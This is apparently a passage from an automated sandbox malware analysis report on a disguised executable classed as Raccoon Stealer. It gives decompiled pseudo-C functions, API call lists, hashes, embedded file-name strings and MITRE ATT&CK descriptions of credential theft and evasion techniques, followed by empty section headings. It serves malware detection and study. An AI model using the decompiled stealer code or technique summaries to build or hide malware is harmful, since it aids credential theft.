				_t100 =  *((intOrPtr*)( *_v60 + 0xc8))(_v60,  &_v48);
				asm("fclex");
				_v64 = _t100;
				if(_v64 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xc8);
					_push(0x40ed24);
					_push(_v60);
					_push(_v64);
					L00401856();
					_v96 = _t100;
				}
				_t101 = _v48;
				_v24 = _t101;
				L00401850();
				_push(0x4177d7);
				return _t101;
			}

0x004175bb
0x004175c6
0x004175c7
0x004175ce
0x004175d1
0x004175d9
0x004175dc
0x004175ea
0x00417604
0x004175ec
0x004175ec
0x004175f1
0x004175f6
0x004175fb
0x004175fb
0x0041761f
0x00417623
0x00417628
0x0041762b
0x00417632
0x0041763c
0x00417646
0x00417647
0x00417648
0x00417649
0x00417652
0x00417658
0x0041765a
0x00417661
0x0041767d
0x00417663
0x00417663
0x00417668
0x0041766d
0x00417670
0x00417673
0x00417678
0x00417678
0x00417684
0x00417690
0x004176aa
0x00417692
0x00417692
0x00417697
0x0041769c
0x004176a1
0x004176a1
0x004176c5
0x004176c9
0x004176ce
0x004176d9
0x004176df
0x004176e1
0x004176e8
0x00417704
0x004176ea
0x004176ea
0x004176ef
0x004176f4
0x004176f7
0x004176fa
0x004176ff
0x004176ff
0x0041770b
0x00417717
0x00417731
0x00417719
0x00417719
0x0041771e
0x00417723
0x00417728
0x00417728
0x0041773d
0x0041774c
0x0041774f
0x00417751
0x00417758
0x00417771
0x0041775a
0x0041775a
0x0041775c
0x00417761
0x00417764
0x00417767
0x0041776c
0x0041776c
0x00417778
0x00417787
0x0041778d
0x0041778f
0x00417796
0x004177b2
0x00417798
0x00417798
0x0041779d
0x004177a2
0x004177a5
0x004177a8
0x004177ad
0x004177ad
0x004177b6
0x004177ba
0x004177c1
0x004177c6
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004175D1
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 004175F6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417623
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041763C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000174), ref: 00417673
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00417684
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 0041769C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004176C9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000170), ref: 004176FA
__vbaFreeObj.MSVBVM60 ref: 0041770B
__vbaNew2.MSVBVM60(0040ED14,0041B2D4), ref: 00417723
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 00417767
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,000000C8), ref: 004177A8
__vbaFreeObj.MSVBVM60 ref: 004177C1

Strings

p"w, xrefs: 004175E3, 004175EC, 004175FB, 00417604, 00417689, 00417692, 004176A1, 004176AA

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk
String ID: p"w
API String ID: 2989710064-3261273085
Opcode ID: 72ee16cc546e13771a545690db43abb73ea41f1a90d217bfdc860c00d552f89a
Instruction ID: 17412f9f9bf85fb6f9b2a28efa00d03290b7157b9f09f0a144eff6506c79146d
Opcode Fuzzy Hash: 72ee16cc546e13771a545690db43abb73ea41f1a90d217bfdc860c00d552f89a
Instruction Fuzzy Hash: 0061F171D00208EFCB01EFA5D989BDDBBB5FF08704F20442AF112BB2A0D77869859B59

Uniqueness

Uniqueness Score: -1.00%

Function 00416173, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00416173(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _t65;
				signed int _t70;
				char* _t75;
				signed int _t78;
				intOrPtr _t93;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				_push(0x3c);
				L004015E0();
				_v12 = _t93;
				_v8 = 0x401430;
				if( *0x41b2d4 != 0) {
					_v64 = 0x41b2d4;
				} else {
					_push(0x41b2d4);
					_push(0x40ed14);
					L0040185C();
					_v64 = 0x41b2d4;
				}
				_v40 =  *_v64;
				_t65 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
				asm("fclex");
				_v44 = _t65;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40ed04);
					_push(_v40);
					_push(_v44);
					L00401856();
					_v68 = _t65;
				}
				_v48 = _v36;
				_t70 =  *((intOrPtr*)( *_v48 + 0xe0))(_v48,  &_v32);
				asm("fclex");
				_v52 = _t70;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40ed24);
					_push(_v48);
					_push(_v52);
					L00401856();
					_v72 = _t70;
				}
				_v60 = _v32;
				_v32 = _v32 & 0x00000000;
				L00401814();
				L00401850();
				if( *0x41b010 != 0) {
					_v76 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v76 = 0x41b010;
				}
				_t75 =  &_v36;
				L00401862();
				_v40 = _t75;
				_t78 =  *((intOrPtr*)( *_v40 + 0x1ac))(_v40, _t75,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x324))( *_v76));
				asm("fclex");
				_v44 = _t78;
				if(_v44 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x40eaf4);
					_push(_v40);
					_push(_v44);
					L00401856();
					_v80 = _t78;
				}
				L00401850();
				L00401700();
				_v28 = _t78;
				_push(0x416313);
				L0040182C();
				return _t78;
			}

0x00416178
0x00416183
0x00416184
0x0041618b
0x0041618e
0x00416196
0x00416199
0x004161a7
0x004161c1
0x004161a9
0x004161a9
0x004161ae
0x004161b3
0x004161b8
0x004161b8
0x004161cd
0x004161dc
0x004161df
0x004161e1
0x004161e8
0x00416201
0x004161ea
0x004161ea
0x004161ec
0x004161f1
0x004161f4
0x004161f7
0x004161fc
0x004161fc
0x00416208
0x00416217
0x0041621d
0x0041621f
0x00416226
0x00416242
0x00416228
0x00416228
0x0041622d
0x00416232
0x00416235
0x00416238
0x0041623d
0x0041623d
0x00416249
0x0041624c
0x00416256
0x0041625e
0x0041626a
0x00416284
0x0041626c
0x0041626c
0x00416271
0x00416276
0x0041627b
0x0041627b
0x0041629f
0x004162a3
0x004162a8
0x004162b3
0x004162b9
0x004162bb
0x004162c2
0x004162de
0x004162c4
0x004162c4
0x004162c9
0x004162ce
0x004162d1
0x004162d4
0x004162d9
0x004162d9
0x004162e5
0x004162ea
0x004162ef
0x004162f2
0x0041630d
0x00416312

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 0041618E
__vbaNew2.MSVBVM60(0040ED14,0041B2D4,?,?,?,?,004015E6), ref: 004161B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED04,00000014), ref: 004161F7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040ED24,000000E0), ref: 00416238
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00416256
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041625E
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00416276
__vbaObjSet.MSVBVM60(?,00000000), ref: 004162A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAF4,000001AC), ref: 004162D4
__vbaFreeObj.MSVBVM60(00000000,?,0040EAF4,000001AC), ref: 004162E5
#615.MSVBVM60(00000000,?,0040EAF4,000001AC), ref: 004162EA
__vbaFreeStr.MSVBVM60(00416313), ref: 0041630D

Strings

p"w, xrefs: 00416263, 0041626C, 0041627B, 00416284

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#615ChkstkMove
String ID: p"w
API String ID: 937528043-3261273085
Opcode ID: c47d1eadc4dae4779cce8abadec32a57fb6ee1c27e11ac920302973c9def717a
Instruction ID: f9639a56a9b14a02efdafc6be3ced8a7f7a998215bb696a4ed893d8fffd2d5ef
Opcode Fuzzy Hash: c47d1eadc4dae4779cce8abadec32a57fb6ee1c27e11ac920302973c9def717a
Instruction Fuzzy Hash: AD51D371D00208EFDB10EFA5C985BDDBBB4FF08318F20846AE411B62A0D7799985DF69

Uniqueness

Uniqueness Score: -1.00%

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798617531.0000000000740000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiBoshiyuki Tasui@ vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki TasuiK vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2X vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasui. vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798978298.0000000002AD0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exeFE2XBoshiyuki Tasuiw vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000000.651225218.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854463696.000000006D2BB000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamenss3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.845882655.0000000000A42000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854151367.000000006D162000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853350592.000000001E180000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000000.797569198.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853312694.000000001E010000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853293961.000000001DEC0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853337212.000000001E160000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Binary or memory string: OriginalFilenameindsetknopw.exe vs CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 0041655B, Relevance: 58.0, APIs: 27, Strings: 6, Instructions: 233
COMMON

Function 00414A36, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 252
COMMON

Function 00415D00, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 144
COMMON

Function 00417AB6, Relevance: 73.9, APIs: 39, Strings: 3, Instructions: 426
COMMON

Function 004190C3, Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 354
COMMON

Function 00414E73, Relevance: 65.1, APIs: 34, Strings: 3, Instructions: 344
COMMON

Function 00417106, Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 325
COMMON

Function 00419631, Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 346
COMMON

Function 004156DD, Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 237
COMMON

Function 00416927, Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 218
COMMON

Function 00418415, Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 313
COMMON

Function 00416CD1, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 258
COMMON

Function 00415A39, Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 174
COMMON

Function 00414662, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 273
COMMON

Function 004189C2, Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 203
COMMON

Function 0041543E, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 166
COMMON

Function 004143B6, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 180
COMMON

Function 004177EA, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 190
COMMON

Function 0041819E, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 168
COMMON

Function 00419B91, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 125
COMMON

Function 00418E81, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 160
COMMON

Function 0041418E, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 155
COMMON

Function 00415F32, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 154
COMMON

Function 00413F82, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 149
COMMON

Function 00418CBA, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 118
COMMON

Function 00416326, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 147
COMMON

Function 004175B6, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
COMMON

Function 00416173, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118
COMMON